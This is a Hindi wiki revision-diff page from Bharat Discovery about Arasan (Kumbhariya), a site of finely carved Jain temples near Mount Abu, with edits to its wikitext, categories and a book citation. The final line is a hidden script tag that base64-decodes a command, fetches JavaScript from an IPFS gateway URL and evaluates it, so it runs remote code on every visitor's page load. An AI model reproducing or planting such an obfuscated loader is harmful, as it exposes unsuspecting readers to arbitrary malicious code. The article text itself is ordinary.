Difference between revisions of "आरासण"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
{{पुनरीक्षण}}
+
'''आरासण''' [[माउंट आबू|आबू]] के निकट [[दिलवाड़ा जैन मंदिर|दिलवाड़ा मंदिरों]] की भांति ही यहाँ भी उच्चकोटि की शिल्पकला के उदाहरण-रूप कई [[जैन]] मंदिर स्थित हैं। इनकी पत्थर की नक़्क़ाशी सराहनीय है। इसका नाम '''कुंभारिय''' भी है। इस स्थान का तीर्थमाला चैत्यवंदन नामक [[जैन]] स्तोत्र में इस प्रकार उल्लेख है-  
'''आरासण''' [[माउंट आबू|आबू]] के निकट [[दिलवाड़ा जैन मंदिर|दिलवाड़ा मंदिरों]] की भांति ही यहाँ भी उच्चकोटि की शिल्पकला के उदाहरण-रूप कई जैन मंदिर स्थित हैं। इनकी पत्थर की नक़्क़ाशी सराहनीय है। इसका नाम कुंभारिय भी है। इस स्थान का तीर्थमाला चैत्यवंदन नामक [[जैन]] स्तोत्र में इस प्रकार उल्लेख है-  
 
 
:'कुंतिपल्लवहहारतारणगढे सोपारकारासणो।  
 
:'कुंतिपल्लवहहारतारणगढे सोपारकारासणो।  
  
{{प्रचार}}
+
 
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 +
*ऐतिहासिक स्थानावली | पृष्ठ संख्या= 69-70| विजयेन्द्र कुमार माथुर |  वैज्ञानिक तथा तकनीकी शब्दावली आयोग | मानव संसाधन विकास मंत्रालय, भारत सरकार
 +
 +
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{राजस्थान के ऐतिहासिक स्थान}}
 
{{राजस्थान के ऐतिहासिक स्थान}}
Line 15: Line 15:
 
[[Category:राजस्थान के ऐतिहासिक स्थान]]
 
[[Category:राजस्थान के ऐतिहासिक स्थान]]
 
[[Category:जैन धार्मिक स्थल]]
 
[[Category:जैन धार्मिक स्थल]]
[[Category:जैन धर्म कोश]]
+
[[Category:जैन धर्म कोश]][[Category:धर्म कोश]]
[[Category:ऐतिहासिक स्थान कोश]]
+
[[Category:ऐतिहासिक स्थान कोश]] [[Category:ऐतिहासिक स्थानावली]]
 
__INDEX__
 
__INDEX__

Latest revision as of 08:03, 5 May 2018

arasan aboo ke nikat dilava da mandiroan ki bhaanti hi yahaan bhi uchchakoti ki shilpakala ke udaharan-roop kee jain mandir sthit haian. inaki patthar ki naqqashi sarahaniy hai. isaka nam kuanbhariy bhi hai. is sthan ka tirthamala chaityavandan namak jain stotr mean is prakar ullekh hai-

'kuantipallavahaharataranagadhe soparakarasano.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  • aitihasik sthanavali | prishth sankhya= 69-70| vijayendr kumar mathur | vaijnanik tatha takaniki shabdavali ayog | manav sansadhan vikas mantralay, bharat sarakar


bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>